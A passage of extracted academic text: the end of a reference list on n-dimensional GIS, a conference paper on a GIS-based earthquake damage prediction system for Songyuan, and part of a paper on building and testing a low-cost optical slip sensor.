topology. In: Proceedings of the 2nd ACM symposium on solid modelling and applications. New York: ACM,. Hanson AJ. 1994. Geometry for N-dimensional graphics. In: Heckbert PS, ed. Graphics gems IV. San Diego: Academic Press Professional, 149–170, chapter 11.6. Hanson AJ, Cross RA. 1993. Interactive visualization methods for four dimensions. In: VIS’93 proceedings of the 4th conference on visualization’93. New York: ACM, 196–203. Hanson AJ, Ishkov KI, Ma JH. 1999. Meshview: visualizing the fourth dimension. Technical report. Indiana University. Hinton CH. 1888. A new era of thought. London: Swan Sonnenschein & Co. Ltd. Hollasch SR. 1991. Four-space visualization of 4D objects. Master’s thesis, Arizona State University. Hornsby K, Egenhofer MJ. 2002. Modeling moving objects over multiple granularities. Annals of Mathematics and Artificial Intelligence 36(1–2):177–194. Jones C, Abraham I. 1986. Design considerations for a scale-independent cartographic database. In: Marble D, ed. Proceedings of the 2nd international symposium on spatial data handling. 384–398. Kada M. 2007. Scale-dependent simplification of 3D building models based on cell decomposition and primitive instancing. In: COSIT 2007. Lecture notes in computer science, vol. 4736. Berlin, Heidelberg: Springer-Verlag, 222–237. Kageyama A. 2016. A visualization method of four dimensional polytopes by oval display of parallel hyperplane slices. Available at https://arxiv.org/pdf/1607.01102.pdf. Kraak M-J. 2003. The space-time cube revisited from a geovisualization perspective. In: Proceedings of the 21st international cartographic conference, 1988–1996. Lienhardt P. 1994. N-dimensional Generalized combinatorial maps and cellular quasi- manifolds. International Journal of Computational Geometry and Applications 4(3):275–324 DOI 10.1142/S0218195994000173. Luebke D, Reddy M, Cohen JD, Varshney A, Watson B, Huebner R. 2003. Level of detail for 3D graphics. Burlington: Morgan Kaufmann Publishers. Massey WS. 1983. Cross products of vectors in higher dimensional euclidean spaces. The American Mathematical Monthly 90(10):697–701 DOI 10.2307/2323537. Masuda H. 1993. Topological operators and boolean operations for complex-based non- manifold geometric models. Computer-Aided Design 25(2):119–129. McKenzie JW, Williamson IP, Hazelton N. 2001. 4-D Adaptive GIS: justification and methodologies. Technical report. Department of Geomatics, The University of Melbourne. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 20/22 https://peerj.com http://dx.doi.org/10.1007/BF01936872 http://dx.doi.org/10.1080/01490419709388100 https://arxiv.org/pdf/1607.01102.pdf http://dx.doi.org/10.1142/S0218195994000173 http://dx.doi.org/10.2307/2323537 http://dx.doi.org/10.7717/peerj-cs.123 McMullen C. 2008. The visual guide to extra dimensions: visualizing the fourth dimension, higher-dimensional polytopes, and curved hypersurfaces. Scotts Valley: CreateSpace Independent Publishing Platform. Meijers M. 2011a. The space-scale cube: an integrated model for 2D polygonal areas and scale. In: Fendel EM, Ledoux H, Rumor M, Zlatanova S, eds. Proceedings of the 28th urban data management symposium. Delft: ISPRS Archives, 95–101 vol. XXXVIII- 4/C21. Meijers M. 2011b. Variable-scale Geo-information, PhD thesis, Delft University of Technology. Muller DE, Preparata FP. 1978. Finding the intersection of two convex polyhedra. Theoretical Computer Science 7(2):217–236 DOI 10.1016/0304-3975(78)90051-8. Noll AM. 1967. A computer technique for displaying n-dimensional hyperobjects. Communications of the ACM 10(8):469–473 DOI 10.1145/363534.363544. Noll AM. 1968. Computer animation and the fourth dimension. In: Proceedings of the December 9-11, 1968, fall joint computer conference, part II. ACM, 1279–1283. Paul N. 2012. Signed simplicial decomposition and overlay of n-D polytope complexes. Available at http://arxiv.org/abs/1205.5691. Peucker TK, Chrisman NR. 1975. Cartographic data strutures. The American Cartogra- pher 2(1):55–69 DOI 10.1559/152304075784447289. Peuquet DJ. 1994. It’s about time: a conceptual framework for the representation of temporal dynamics in geographic information systems. Annals of the Association of American Geographers 84(3):441–461 DOI 10.1111/j.1467-8306.1994.tb01869.x. Peuquet DJ, Duan N. 1995. An event-based spatiotemporal data model (ESTDM) for temporal analysis of geographical data. International Journal of Geographical Information Science 9(1):7–24 DOI 10.1080/02693799508902022. Plümer L, Gröger G. 1997. Achieving integrity in geographic information systems—maps and nested maps. GeoInformatica 1(4):345–367 DOI 10.1023/A:1009706411129. Poincaré M. 1895. Analysis situs. Journal de l’École polytechnique 2(1):1–123. Requicha AAG, Voelcker HB. 1977. Constructive solid geometry. Technical memoran- dum 25. College of Engineering & Applied Science, The University of Rochester. Riemann B. 1868. Ueber die Hypothesen, welche der Geometrie zu Grunde liegen. In: Abhandlungen der Königlichen Gesellschaft der Wissenschaften zu Göttingen. vol. 3. Göttingen: Königlichen Gesellschaft der Wissenschaften. Rigaux P, Scholl M. 1995. Multi-scale partitions: application to spatial and statistical databases. In: Egenhofer MJ, Herring JR, eds. Advances in spatial databases. Lecture notes in computer science, vol. 951. Berlin, Heidelberg: Springer, 170–183. Rossignac J, O’Connor M. 1989. SGC: a dimension-independent model for pointsets with internal structures and incomplete boundaries. In: Wosny M, Turner J, Preiss K, eds. Proceedings of the IFIP workshop on CAD/CAM. 145–180. Shreiner D, Sellers G, Kessenich J, Licea-Kane B, Khronos ARB Working Group. 2013. OpenGL programming guide: the official guide to learning OpenGL, version 4.3. 8th edition. Addison-Wesley. Snyder JP. 1987. Map projections—a working manual. Reston: US Geological Survey. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 21/22 https://peerj.com http://dx.doi.org/10.1016/0304-3975(78)90051-8 http://dx.doi.org/10.1145/363534.363544 http://arxiv.org/abs/1205.5691 http://dx.doi.org/10.1559/152304075784447289 http://dx.doi.org/10.1111/j.1467-8306.1994.tb01869.x http://dx.doi.org/10.1080/02693799508902022 http://dx.doi.org/10.1023/A:1009706411129 http://dx.doi.org/10.7717/peerj-cs.123 Sohanpanah C. 1989. Extension of a boundary representation technique for the description of n dimensional polytopes. Computers & Graphics 13(1):17–23 DOI 10.1016/0097-8493(89)90032-0. Steeb W-H. 2011. The nonlinear workbook. 5th edition. Singapore: World Scientific Publishing. Van Oosterom P. 1990. Reactive data structures for geographic information systems. PhD thesis, Leiden University. Van Oosterom P. 2005. Variable-scale topological data structures suitable for progressive data transfer: the GAP-face tree and GAP-edge forest. Cartography and Geographic Information Science 32(4):331–346 DOI 10.1559/152304005775194782. Van Oosterom P, Meijers M. 2014. Vario-scale data structures supporting smooth zoom and progressive transfer of 2D and 3D data. International Journal of Geographical Information Science 28:455–478 DOI 10.1080/13658816.2013.809724. Van Oosterom P, Stoter J. 2010. 5D data modelling: full integration of 2D/3D space, time and scale dimensions. In: Fabrikant SI, Reichenbacher T, Van Kreveld M, Schlieder C, eds. Geographic information science: 6th international conference, GIScience 2010, Zurich, Switzerland, September 14–17, 2010. Proceedings. Berlin, Heidelberg: Springer, 311–324. Wachowicz M, Healy RG. 1994. Towards temporality in GIS. In: Innovations in GIS. Milton Park: Taylor & Francis, 105–115. Worboys M. 1992. A model for spatio-temporal information. In: Proceedings of the 5th international symposium on spatial data handling. 602–611. Worboys MF. 1994. A unified model for spatial and temporal information. The Com- puter Journal 37(1):26–34 DOI 10.1093/comjnl/37.1.26. Worboys MF, Hearnshaw HM, Maguire DJ. 1990. Object-oriented data modelling for spatial databases. International Journal of Geographical Information Systems 4(4):369–383 DOI 10.1080/02693799008941553. Yau M-M, Srihari SN. 1983. A hierarchical data structure for multidimensional digital images. Communications of the ACM 26(7):504–515 DOI 10.1145/358150.358158. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 22/22 https://peerj.com http://dx.doi.org/10.1016/0097-8493(89)90032-0 http://dx.doi.org/10.1559/152304005775194782 http://dx.doi.org/10.1080/13658816.2013.809724 http://dx.doi.org/10.1093/comjnl/37.1.26 http://dx.doi.org/10.1080/02693799008941553 http://dx.doi.org/10.1145/358150.358158 http://dx.doi.org/10.7717/peerj-cs.123 work_yo4hhuxsifh47lsegdobem34hi ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 1 Earthquake Damage Predicting System of Songyuan Based on GIS Su Zhenjiang Institute of Disaster prevention The GIS Association of Institution of Disaster Prevention Beijing, China e-mail: 75672946@qq.com Huang Meng* Institute of Disaster prevention The GIS Association of Institution of Disaster Prevention Beijing, China e-mail: 398727732@qq.com Xie Shaohui Institute of Disaster prevention The GIS Association of Institution of Disaster Prevention Beijing, China e-mail: 1004120572@qq.com Zhang Dian Institute of Disaster prevention The GIS Association of Institution of Disaster Prevention Beijing, China e-mail: 774847587@qq.com Wang Zhe Institute of Disaster prevention The GIS Association of Institution of Disaster Prevention Beijing, China e-mail: 1015382294@qq.com Abstract—With the rapid development of cities, the research on urban seismic damage prediction should have a breakthrough based on the modern technology. The paper takes Songyuan of Jilin Province as the research object, and creates a spatial database by field data and Baidu maps. We simulate the earthquake by using the seismic intensity algorithm of the point source and the line source, use the spatial analysis method of PHP+GIS to simulate the influence at different earthquake levels on the urban buildings in Songyuan. At the same time, PHP, HTML and dynamic cutting technique were used to evaluate the disaster in 10 minutes after the earthquake. This system will provide technical support for the prevention of earthquake damage in Songyuan. Keywords-Earthquake Damage Prediction; Songyuan; Baidu Maps API; Rapid Assessment I. INTRODUCTION With the rapid development of Chinese economy and the urbanization process, more and more attention is supposed to be put on the potential threat of earthquakes to people's lives and property. If we can use GIS technology to simulate the loss may be caused by the earthquake to the city before the disaster, and estimate the severe disaster area to shrink the scope of rescue, it will provide the management decision- making institutions with reliable technical support. Therefore, it is very meaningful to develop a GIS-based earthquake seismic hazard prediction system. GIS technology, with its intuitive characteristics, is widely used in various fields. For example, in 2009, Professor Yuan Longbo of the School of Civil and Hydraulic Engineering of Dalian University of Technology made an Earthquake predicting system of urban lifeline based on GIS, which made a rational analysis of the influence of urban pipe network connectivity and damage on pipe network, but it didn’t comprehensively discuss the influence of pipeline network on urban buildings. In 2012, Zhao Qi, a director of the Structural Engineering and Disaster Prevention Research Institute of Tongji University, made a Study on Application of High Resolution Remote Sensing Images in Rapid Prediction of Earthquake Disaster in Urban Area. This technology adapts to the needs of large-scale regional earthquake damage prediction work, but because remote sensing satellites cannot provide real-time image, the project cannot meet the requirements of post-earthquake rapid assessment. In 2013, Wang Dongming, a researcher at the China Earthquake Prevention Center, made a Research on Urban Earthquake Damage Prediction Virtual Simulation System. Professor Wang adopted the city simulation based on VR technology, but the whole development cost is high, which is not conducive to promotion. In 2016, Xiao Xinghui, a teacher of China Ocean University, made a Prediction Model of Urban Bridge Seismic Damage Based on Least Squares Support Vector Machine, which is mainly aimed at the study of urban bridges, but didn’t study the seismic modeling of urban buildings. To summary, although many researchers have made different directions for urban earthquake damage prediction, but for the rapid assessment of urban construction disaster is still left blank. Therefore, the paper, through the study on earthquake damage prediction and the feasibility of software implementation, has developed an earthquake intensity model software aimed at Songyuan, Jilin Province, and it also is a platform for analysis that can be combined with multiple factors to give disaster assessment and rescue information. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 2 II. SYSTEM DESIGN A. Design of Systematic Framework Figure 1. Functional structure diagram Figure 2. Technical flow chart B. Database The correctness of the prediction results of the earthquake predicting system in Songyuan depends on the reliability of the data source. This project lasted more than a year, we carried out comprehensive field survey and data collection of more than 3000 buildings located at Ningjiang district, Fuyu City, Qian'an County, Changling County and Ross Mongolian Autonomous County in Songyuan, which finally collected about 120 thousand complete messages. The coordinate system in map is Beijing 54 coordinate system, and the coordinates of building are SHP format data through the field research. The map component is used Baidu maps interface. Because its own coordinates, we need a coordinate conversion. There are many methods for coordinate conversion, and this system uses recursive callback method requesting API for batch processing of coordinate data. Many articles are described in detail about the method, so we don't go into details. Another place to be pretreated is the vulnerability of building structures to different seismic grades. For this point, the paper draws on the study of the seismic performance of buildings by Yi Qian researcher, carries out the prediction examples based on the damage of Shenyang and Wuhan city, combined with the data of the existing foundation, and uses the vulnerability of building structures to earthquake disaster prediction science describing failure degree of building and loss of the city under different intensity earthquake damage. The specific algorithm is as follows: Vulnerability of the building structure is the probability or possibility of a certain degree of damage occurring under the determined earthquake intensity. China earthquake intensity table to the building's damage level is divided into basic intact, minor damage, moderate damage, serious damage and destruction of five grades. The researchers divided our buildings into four categories according to the vulnerability level. Class A mainly includes multi-storey steel and reinforced concrete structures, and the seismic capacity is the best. Class B mainly includes brick structure, industrial building and the seismic capacity is inferior to Class A; Class C mainly includes without formal design, open brick structure; D class for the soil structure, is the worst type of earthquake resistance. (1) In the formula, VID is the structural vulnerability index, it is the seismic damage matrix of building, I means the seismic intensity, Dj means the damage level of the house, it is the damage rate of the house when the j damage occurs. The smaller the vulnerability index is, the better the seismic capacity of structure is, and the smaller the earthquake loss is. This project combines the historical seismic damage statistics method and test method, through the collection of buildings under different intensities of damage degree of seismic data in recent years, the analysis of the vulnerability of different types of buildings, combined with the test method to simulate the specific building and the corresponding experimental results and got the intensity of vulnerability index, then fitting out the fragility curves of all kinds of buildings. For example, the project survey in Ningjiang district of Songyuan city is a high-rise concrete building, according to the fragility curves of the building. The building is estimated at six level showed a good intensity, showing good intensity at level seven, damaged in eight level intensity, in nine levels of intensity is moderate 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 3 damage, severe in the ten stage damage intensity. Part of the field of the building database is shown in figure 3: Figure 3. Schematic diagram of database vulnerability C. Database Design Database plays an important role in the system platform, so it is very important to design a reasonable database structure. The population, economic and geographical data from different data source formats such as TXT text format, EXCLE format, and SHP format, we need to provide for different kinds of data sources in the database data entry interface. At the same time, when the database is built, the data redundancy and the feasibility of the later maintenance are also need to be considered. Through several design schemes, the relational database scheme with the building number as the unique identifier and the multi table association is adopted. TABLE I. THE MAIN FIELD AND DESCRIPTION Field table Field Name explanation 1 buildingNumber Primary key column, used for field matching, multi-table joint query 2 X Y actual coordinates, through the actual investigation 3 baidu_X baidu_Y Baidu coordinates, through the actual coordinates of the building coordinates obtained after conversion 4 propertyType Building Type, used to screen different types of buildings 5 nameOfHous Head of household name 6 constructionAge Building age 7 sixDegrEarthDam sevenDegrEarthDam eightDegrEarthDam nineDegrEarthDam tenDegrEarthDam Building Vulnerability Level, Damage degree of housing at different intensity levels This project implements the data import interface for different data sources, and add the relevant attribute information according to the building number to dynamically. Taking into account the late housing information replacement, this project provides an interface for dynamically modifying updated data. With this kind of interface, all data can be updated in real time. III. STYLING SYSTEM IMPLEMENTATION This paper is based on the point set and line set data from Songyuan city survey, using Baidu map to display the building information and lifeline engineering in Songyuan. The seismic intensity model of point source and line source is used to simulate the earthquake, and the earthquake disaster and building damage are evaluated automatically. User can export the result to the document and export the relevant Word document according to the requirement. Here we will make a preliminary demonstration of the key functional algorithm ideas: A. Elliptic intensity attenuation method In the work of seismic safety evaluation, earthquake zoning and post-earthquake rapid assessment, as an important indicator of earthquake motion, the attenuation relation and law of earthquake intensity have obvious regionality. Because of the typical plain landform of Songyuan city and a lot of very mature elliptical intensity attenuation research, the paper adopts the intensity attenuation relation of line source earthquake in North China proposed by Sha Haijun as the attenuation model of Songyuan intensity. )073.13ln(169.0433.0949.1064.0 )035.27ln(151.0923.0010.2033.2 ' s ' l   RMMI RMMI ）（）（ (2) In this formula, the variable I represents the intensity, the variable M means the magnitude, and R represents the epicenter distance (km), the lower corner of the standard l, s represents the long and short axis. The difficulty of this project is the combination of elliptical intensity attenuation method and Baidu map to truly achieve the simulation of ellipse intensity on map. For this reason, we abstracted it as a mathematical model to achieve. F(X，Q，R，Y，Z)=0 is a set of points, F is the input set, X is the coordinate point of the focal position, Q is the strong earthquake action, R is the epicentral distance, Y is the deflection angle under the action of the fault zone, Z is the output set. Then the model is rewritten into a computer language and implemented with a class, and the coordinates of all points on the intensity map are obtained. Simulation of a 7.5 earthquake occurred, according to the long and short axis intensity attenuation algorithm effect shown in Figure 4. Figure 4. Longitudinal axis elliptical intensity attenuation method In contrast, the circular intensity attenuation method is relatively simple to implement based on the ellipse. The circular model assumes that the seismic source is a point source, ignoring the effect of seismic fault rupture on ground motion, and the seismic intensity decreases with increasing epicentral distance. As Matsubara is located in the plains, according to the empirical formula of earthquake attenuation, I = M + 2 where I is the intensity of the earthquake and M is the magnitude. In general, the higher the intensity of attenuation, the faster the decay of 10 degrees to 9 degrees 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 4 after 5km or so, followed by 9 degrees to 8 degrees after 8km, 8 degrees to 7 degrees after 20km, 7 degrees to 6 degrees to go through 40km or so. According to this model, the intensity attenuation diagram of an earthquake can be dynamically generated by controlling the radius of the circular intensity circle at all levels. Simulation of the occurrence of a 7 earthquake and according to the disaster situation will be severely affected buildings automatically grouped the effect shown in Figure 5. Figure 5. Circular intensity attenuation method In addition, our system has also realized the function of earthquake damage prediction for lifeline engineering, and the multi layer analysis with the overlay of the building layer. The effect is shown in Figure 6. Figure 6. Damage prediction for lifeline engineering B. Document export Document export is a key part of the evaluation system, the user can then manipulate the system to obtain automatically generated documents and data from the composition of the document, which to a large extent save the time to artificially export data. This project uses the PHPWord class library to complete the requirements for generating documents and formats. And designs the delay module by several dynamic statistics, combined with H5 latest technology dynamic capture window real-time capture analysis results, finally can be saved in the cache folder. Because the ThinkPHP framework does not provide support for the direct operation of Microsoft word and PowerPoint, then we change our mind in the Windows environment. This project starts by modifying the PHP configuration file php.ini to start the support of PHP zip, thus gaining the PHPWord class library 0.6.2-1 version, and extending the support for MS Word and PowerPoint. Because the PHPWord class library is a class library edited abroad, there still exists the problem of Chinese garbled code. It will translate the input text into utf8_ encode code. That is to say, using GBK, GB2312 or utf8 code will appear garbled situation, so we use utf8 encoding. At the same time, we find the utf8_encode transcoding in all the methods in the class library, delete them, and use iconv to encode the GBK or GBK2312 code, which can solve the problem better. There are 5 pictures produced in the Word document, namely the intensity circle map of the earthquake area, the distribution map of the destruction of the houses in the earthquake area, the pie charts of the houses damaged in the earthquake area, the column of the destruction of the houses in the earthquake area and the architectural situation in the city. Each picture is waiting for the page finishes loading through the delay module, real-time dynamic crawl on the window with screenshots of components, and then gain access to the data stream to the interception time to distinguish cached in the corresponding folder. When exporting, we read the cache file, and we insert the picture through the function called addImage. The module can quickly export the electronic documents of damaged buildings after earthquake simulation, and reduce the occupation of computer memory resources by using cache, which has the characteristics of flexibility and portability. The seismic damage prediction results of Figure 4 are derived by using Word, which is shown in Figure 7: Figure 7. Export the document part of the schematic IV. CONCLUSION This paper is based on the theory of earthquake damage prediction for the terrain of Songyuan, cleverly combines a variety of methods such as seismic intensity algorithm for point source and line source, PHP + GIS spatial analysis method, PHP + HTML + dynamic cutting Technology, to apply GIS theory to the actual development needs. It’s different from the previous urban earthquake damage prediction system, and the system data sources are more comprehensive and reliable. In the calculation of data processing in this system, the results have been collated in the form of presenting qualified documents, which is very convenient to the user's operation. The system also has room for upgrading, and it is expected to continue to increase the function module of casualties statistics, so as to make the system function more perfect. The implementation of the project is based on its rapid exporting of derived products within 10 minutes, which make up for the current earthquake industry in the post earthquake rapid assessment of the blank. The system provides a powerful scientific basis for improving the ability 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 5 of urban earthquake prevention and disaster reduction by revealing the weak links of urban building earthquake. At the same time, it also provides some technical support for earthquake damage prediction in Songyuan. ACKNOWLEDGMENTS This work was supported by the Special Fund of Fundamental Scientific Research Business Expense for Higher School of Central Government (No. ZY20160106). REFERENCES [1] Yuan Yongbo, Bai Guangbin, Zhang Mingyuan. GIS based prediction system for earthquake damage of urban lifelines Liaoning University of Technology and Technology (Natural Science Edition, December 2010) Technology based on GIS in Changchun City earthquake damage prediction technology 2009-04 [2] Zhao Qi, Zhai Yong-mei, Li Tiezheng Application of high-resolution remote sensing image in urban rapid earthquake damage prediction [J]. Software Journal, 2012, 02-0072-05 [3] Wang Dongming, Study on virtual simulation system of urban earthquake damage prediction [J]. China Earthquake Disaster Prevention Center, 2013, 01-0098-05 [4] Zhang Yu, Kang Jianhong, Wei Meixuan, Li Na, Yang Qing, Study on prediction model of earthquake damage of urban bridge based on least squares support vector machine. Geophysical and geochemical exploration, 2014, 38 (5); 03-0124-08 [5] Wu Qing, Gao Mengtan. Study on historical earthquake magnitude and epicenter using elliptical intensity attenuation relationship [J]. Institute of Geophysics, China Earthquake Administration, 2015, 12: 76-79. work_yprpgiiievbp5bhrll36375u3e ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-011 93 Cheap and Simple Slip Sensor Based on the Optical Sensor Feibi Liu University of Southampton, Southampton, UK, SO17 1BJ e-mail: 2496909486@qq.com Abstract—The purpose of this project is to manufacture a cheap and simple slip sensor. The slip sensor is based on the optical sensor. The experiment divides into two parts, how to build sensor and how to test the features of the sensor. The slip sensor could be divided into three parts, cover, optical sensor and adaptor board, which will connect to the suitable resistors circuit to obtain the large gain. During the test, the participant applies the static state way to measure the relationship between input and output with a white cover and a gray cover. The slip sensor with the white cover has low hysteresis and high repeatability which are better than the gray cover. Keywords-Slip Sensor; Optical Sensor; Force Sensor; Static State; Reflective Object Sensor I. INTRODUCTION When humans try to grasp an object, they do not need to know the parameters (like mass) of the object. They just control the force of the hand which ensures the object will not fall by human ‘feeling’. For the robot hand, the slip sensors which fix on the fingertips could give the feedback (it is like human’s feeling) to the CPU which could control the force of the robot hand [1]. In a sense, the slip sensor is a kind of the force sensor, because the feedback of the slip sensor is related to the force which puts on the surface of slip sensor. Only different is the slip sensor focuses on the force changing between the object slipping and not slipping. There are many kinds of methods to build a slip sensor or a force sensor, which bases different theories. At the beginning, Luo used piezoresistive strain gauge on the robot links to detect the force and this was used in this field for a long time. However, this structure was a little complex comparing the new ways [2]. Cristina Cristalli and Michael R Neuman designed a kind of force sensor by changing the capacitance in dielectric structure[3].They used this sensor to measure the blood pressure and gain a good ratio between the input and output. However, in the experiment, they also found that the ratio between the input and output would change a little when they used the same way to build a same standard sensor. The reason is the different stray capacitances in the environment. Piezoresistive is very popular in industry and research field because of low cost, small and light-weight. However, piezoresistive exists low repeatability and large hysteresis, which will cause the low accuracy. L.Paredes-Madrid group improved the accuracy of piezoresistive by modeling the capacitance. Nevertheless, they still needed to consider how to reduce the force estimation errors [4]. Lorenzo Jamone and his group designed a kind of tactile sensor that based on the hall-effect theory. This sensor detected the changing of the magnetic field when the force pushed on the sensor to give a feedback to control. After the experiment, they found this kind of sensor had high sensitivity, low hysteresis, and good repeatability, but the experiment just tested the force on normal component [5]. Samir Boukhenous and Mokhtar Attari also used the Hall-effect theory to produce a pinch grip sensor, which had a good response to input and output. However, the experiment also focused on the normal direction [6]. Darko Belavic and his group completed an experiment about the low energy consumption of different types of pressure sensors which included the piezoelectric sensor. This piezoelectric sensor was based on the performances of the ferroelectric thick films, which could transform the pressure into shifted resonant frequency of diaphragm which could be regarded as an output signal. They concluded that the piezoelectric resonant sensor was suitable for low energy consumption and the energy consumption was mainly International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 94 dependent on materials and structures, but it was not sample work to reduce consumption because of complete relationships between every component in sensor [7]. Shouhei Shirafuji and Koh Hosoda developed a robot hand which combined the strain gauge sensor and piezoelectric polyvingylidenefluoride (PVDF) sensor to measure stresses and detect slipping. The PVDF sensor could detect the variations of the force which was caused by the slipping of the object. However, the PVDF sensor needed the high reactive ability and high resolution to detect the slipping [8]. A. Persichetti, F. Vecchi and M. C. Carrozza, presented a contact sensor using optical theory, which based on detecting the changes of the light beams intensity. Figure 1 showed the structure of this kind of sensor, which included a soft silicone cover, a receiver (a phototransistor) and a transmitter (an infrared photodiode). When the force pressured on the cover, the intensity of the light which reflects the receiver will change. Therefore, this sensor has high sensitivity, fast response and could enhance the immunity to noise by adjusting the light intensity from the transmitter [9]. Figure 1. The structure of the optical sensor For this paper, the participant will utilize the optical theory to build a cheap, simple and low consumption slip sensor. Because the photodiode needs to emit high intensity light, the optical sensor will cost high consumption compared with other sensors [10]. Therefore, the participant tried to find a good material which could reduce the loss during reflecting, which could reduce the requirement of the light intensity which is emitted by the photodiode. This could reduce the consumption. For obtaining a good response, the participant also chooses suitable resistors to get large amplifier gain. Comparing with an optical sensor which is built by A. Persichetti and his friends [9], the most different in this paper is the participant use cast Perspex acrylic sheet to replace silicone (showing figure 1) as the cover. Because the cast Perspex acrylic sheet is harder than silicone, this replacement could increase the robustness of the sensor. However, this also means the slip sensor may sacrifice some sensitivity. II. METHODOLOGY The purpose of the experiment is to produce a cheap, simple and low consumption slip sensor. Therefore, the experiment could be divided into two parts, the first part is to build the slip sensor and the second part is to test the slip sensor as figure 2. Figure 2. The slip sensor with resistors A. Design The slip sensor includes three parts, cover, optical sensor and adapter board. Figure 3 shows the slip sensor. Therefore, first step, the participant needs to choose a suitable optical sensor. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 95 Figure 3. The slip sensor The QRE1113RG-Minature Reflective Object Sensor is used as the optical sensor because it is mini. As Figure 4 showing, the photodiode (transmitter) which is between the pin 1 and pin 2 emits the light and the phototransistor (receiver) which will receive the reflected light from the cover is fixed between pin 3 and pin 4 [11]. Figure 4. The structure of the QRE1113RG sensor Second step, the participant needs to produce a suitable cover. The cover is made by the 1mm thickness clear cast Perspex acrylic sheet. There are some advantages to using this material. Firstly, the weight is light. Secondly, the cost of the material is low. Thirdly, it is easy to build which just needs a laser cutter. Fourthly, the cast Perspex acrylic sheet has high tensile strength and rigidity, so it could protect the optical sensor which is under the cover. Fifthly, the clear Perspex acrylic could transmit 92% of the visible light, which is simple to the participant to change the color of the cover and detect the influence of the color of the cover [12]. Figure 5 shows the blueprint of the cover. Figure 6 shows the cover after gluing. Figure 5. The cover's blueprint Figure 6. Cover Third step, solder the optical sensor on the adapter board as the figure 7. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 96 Figure 7. The optical sensor with adaptor Figure 8. The circuit's schematic structure Fourth step, choose the suitable resistors to build the circuit. Figure 8 shows the equivalent circuit diagram. RF is used to keep the photodiode (transmitter) working in the ideal voltage range. RC is to amplify the voltage signal. According to the specification of the QRE1113RG, the participant assumes IF =0.028A, which could ensure the photodiode work well at room temperature. Figure 9. Forward current VS Forward Voltage From figure 9, the forward voltage (VF ) should be about 1.33V. According equation 1,RF=168Ω.  Because the participant wants to get the largest reflection light from the cover, the participant puts a white thin paper on the top of the cover during the test. The distance between the top surface of the cover and the top surface of the optical sensor is about 2mm. According to the figure 10, it could easy find that the real collector current IC is 0.45 which is half of collector current at distance 1mm. Figure 10. Normalized Collector Current VS Distance between When IF =0.028A and distance is 1mm, the collector current is around 1.08mA in according specification, so the real collector current IC is0.54mA. Assume the collector-emitter voltage (VCE) is 3.3V which could get International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 97 larger gain. Using the equation 2 gets the collector resistor (RC= 5000Ω).  B. Test These devices were applied in the experiment. EL 155R Power Supply (6V and 0.028A);Amprobe 30XR-A multimeter; Compression testing machine;MDO4054B-3 Mixed Domain Oscilloscope;HMC 8012 digital Multimeter. Figure 11 shows the schematic during testing. Figure 11. The assembly schematic First step, the participant put a white paper on the cover to detect the relationship between the force and voltage. Because the output voltage was more than 2V which is exceed the range of the Amprobe 30XR-A multimeter, the second power supply gave 1V reverse voltage as the offset voltage. Second step, the participant put a weight (1 N) on Compression testing machine and recorded the voltage. Third step, repeated step 2 until there were six weights (6N) on the machine. Fourth step, took the weight (1N) one by one from the machine and recorded the voltage after each operation. After these steps, one group of data was completed. To obtain stable data, the participant repeated five times of these steps and got five groups of data. Next, the participant changed the color of the cover into gray, which just put nothing between the probe and cover, because the probe is in gray. Then, used the same way to get five groups of data. The output voltage is not more than 2V, so the offset voltage does not need. The second power supply is 0V. III. RESULT AND ANALYSES Figure 12 and figure 13, show the relationship between the output voltage and force using white cover. The trend line in each figure could quantize the relationship between the output and input. The R-square shows on each figure mean the reliability of the trend line. When the value is more near the 1, the points should more near the trend line. Usually, when the value is larger than 0.75, the trend line could predict the relationship between the input and output. In each of figure 12 and figure 13, the R-square is larger than 0.98, which means the trend line has high predictability. From these two figures, it is easy to find that the coefficients of these two trend lines are close. Therefore, the sensor has low hysteresis and high repeatability in white color. The offset voltage is around 2.77V, which is a little high. The reason is that the white color reflects almost light which enhances the power that phototransistor received. Figure 12. Meaning of Voltage Vs Force when force is increasing International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 98 Figure 13. Meaning of Voltage Vs Force when force is reducing Figure 14 and figure 15 show the relationship between the output voltage and force using gray cover. However, it is easy to find that the R-square in these two figures is much lower than figure 12 and figure 13. The reason is that the features of the optical sensor between collector current and distance getting from the specification are based on the white paper. All assumes are also based on that condition, using white paper (90% reflective). Therefore, the accuracy of the trend line is low during using gray cover. However, the gain using gray cover (around 0.01) is two times than the gain using white cover (around 0.005). The participant speculates one of group data in figure 14 and 15 is not reliable. From the figure 14 and figure 15, the max output points are much higher than average output points, because one group of the value is much higher than others. This may be caused by hysteresis. Nevertheless, to ensure the authenticity of the experiment. The participant still recorded this group of value. Figure 14. Meaning of Voltage Vs Force when force is increasing Figure 15. Meaning of Voltage Vs Force when force is reducing IV. CONCLUSIONS During the experiment, the participant used a cheap and simple way to build a slip sensor. The participant also found that white cover of the sensor has high repeatability, low hysteresis, and high predictability. However, the gray cover of the sensor has low repeatability and low accuracy. Comparing with other slip sensors which use the optical theory, this slip sensor has high robustness. In the test, the participant used static state way to test the feature of the slip sensor, which could obtain the quantized function information between input and output. However, in the future work, the participant could improve the experiment from these two aspects. First one, the participant should try to detect the response of slip sensor in the dynamic state which means the object is slipping on the sensor. Second one, the participant should design a black box to control the external light. This could help the participant understand the influence of the light in the environment to the sensor cover and find a high resistance of cover to the external light. REFERENCES [1] Paul H Chappell, Darryl P J Cotton, Andy Cranny and Neil M White “EXPERIMENTAL LEAD ZIRCONATE TITANATE (PZT) SLIP SENSOR”, MEC '08 Measuring Success in Upper Limb Prosthetics, Aug.2008 [2] R. Luo, “A Microcomputer-Based intelligent sensor for Multiaxis 